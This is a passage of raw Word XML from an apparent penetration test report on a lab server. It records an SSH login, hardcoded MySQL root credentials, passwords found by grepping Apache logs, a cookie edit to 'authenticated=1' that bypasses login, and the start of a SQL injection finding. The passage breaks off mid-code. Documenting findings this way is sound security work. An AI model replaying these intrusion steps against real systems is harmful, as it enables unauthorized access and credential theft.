            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> gibson@10.10.0.66 -p 443</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B9C340" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">gibson@10.10.0.66's password: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35843908" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          Welcome to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C8CA606" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AC9FDE9" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ███╗   ██╗██████╗ ███╗   ██╗</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221EA34C" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ████╗  ██║██╔══██╗████╗  ██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6B514F" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ██╔██╗ ██║██████╔╝██╔██╗ ██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C1B0E1B" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ██║╚██╗██║██╔══██╗██║╚██╗██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F8E373" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ██║ ╚████║██████╔╝██║ ╚████║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3A6ABF" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ╚═╝  ╚═══╝╚═════╝ ╚═╝  ╚═══╝</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B1E1586" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>**Near-Earth Broadcast Network**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A9CF1C" w14:textId="0DB25B2D" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  *Someone is Always Watching*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF35355" w14:textId="5B1225D2" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06624EB3" w14:textId="0E608F70" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Penetration testing with permission only!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0471E174" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Last login: Sun Apr 30 12:02:42 2023 from 10.10.0.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE2CA00" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gibson@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6210C1C0" w14:textId="5A6C37F1" w:rsidR="002943DD" w:rsidRPr="00F62F5D" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05554973" w14:textId="00966608" w:rsidR="002943DD" w:rsidRPr="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH to Gibson Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C0EFB" w14:textId="5E8ACDC1" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">The assessment team </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>navitaged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002943DD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/var/www/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory to explore the application source code. During this time, they discovered hardcoded credentials for the application MySQL database hardcoded in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002943DD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>login.p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>hp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="002943DD" w14:paraId="64663510" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="796AB305" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>servername</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = "localhost</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0D62BF74" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>$database</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>= '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nbn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>';</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="205789B4" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$username</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>= 'root</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>';</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="11E39F62" w14:textId="143B68F5" w:rsidR="002943DD" w:rsidRPr="00F62F5D" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$password </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r>
              <w:t>[REDACTED]</w:t>
            </w:r>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="400E8513" w14:textId="535449A8" w:rsidR="002943DD" w:rsidRPr="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hardcoded MySQL Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69783E1E" w14:textId="258F8265" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">They also discovered </w:t>
      </w:r>
      <w:r w:rsidR="00EB2EDB">
        <w:t>that the web server logs included usernames and passwords users entered when they attempted to log into the application.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2EDB">
        <w:t xml:space="preserve"> They successfully used the credentials they discovered to log into the web application as the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB2EDB" w:rsidRPr="00EB2EDB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>stephenson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB2EDB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EB2EDB" w14:paraId="01E49CB5" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="55360960" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRPr="00F351BE" w:rsidRDefault="00EB2EDB" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gibson@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$ grep -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> "password" /var/log/apache2/access.log.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151280D1" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRPr="004E111C" w:rsidRDefault="00EB2EDB" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>172.16.1.2 - - [04/May/2020:06:25:33 +0000] "GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>stephenson&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
            <w:r>
              <w:t>&amp;Login=Enter HTTP/1.1" 302 3421 "-"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A5C89DF" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Log Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D2BCB" w14:textId="3F7F29E9" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00A26E1B">
      <w:r>
        <w:t>The assessment team made a zip file containing the source code for the regular application and the staging version of the application that they could download using FTP for offline inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E5104" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRPr="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6"/>
    <w:p w14:paraId="3FABF820" w14:textId="77777777" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037"/>
    <w:p w14:paraId="310FACAA" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C204486" w14:textId="515B27B8" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CC4BC" w14:textId="22B6F97B" w:rsidR="00646037" w:rsidRDefault="00EB2EDB" w:rsidP="00646037">
      <w:r>
        <w:t>The assessment team returned to the web application and attempted to access restricted content without authentication. They were able to bypass the application authentication by intercepting the request with Burp Suite Intercept and changing the value of the authenticated cookie from 0 to 1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EB2EDB" w14:paraId="7D49C57C" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4DE18FAD" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>GET /internal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>employee.php?name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>notarealuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6151B99C" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174A86BE" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211FDE2C" w14:textId="77777777" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>Cookie: authenticated=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754BF02C" w14:textId="5E9B0BD5" w:rsidR="00EB2EDB" w:rsidRPr="004E111C" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="122A2FD8" w14:textId="1894366B" w:rsidR="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Edited Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611AD5B" w14:textId="5B09F260" w:rsidR="00EB2EDB" w:rsidRPr="00EB2EDB" w:rsidRDefault="00EB2EDB" w:rsidP="00EB2EDB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2EDB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5505A41D" wp14:editId="654C2D33">
            <wp:extent cx="5943600" cy="2966720"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
            <wp:docPr id="21024637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3751" name="Picture 1" descr="Graphical user interface&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="296672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Authentication Without Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CCFD49" w14:textId="43584424" w:rsidR="00EB2EDB" w:rsidRDefault="00D22A7D" w:rsidP="00646037">
      <w:r>
        <w:t xml:space="preserve">The assessment team explored the application source code taken from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D22A7D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account both manually and using static code analysis tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D22A7D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Semgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. During this time, they found multiple security issues in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B219177" w14:textId="051A4948" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00646037">
      <w:r>
        <w:t>First, they discovered that the application login portal on the staging version of the application was vulnerable to SQL injection. After the user inputs their name and password, the values are inserted directly into a SQL query string that is executed against the application server database.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D22A7D" w14:paraId="3974B3D4" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5B9622B9" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>// Get username</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29BEF105" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $user = </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'username' ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D31102E" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        // Get password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E46737F" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $pass = $_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'password' ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D604021" w14:textId="539D5DCA" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $pass = md</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
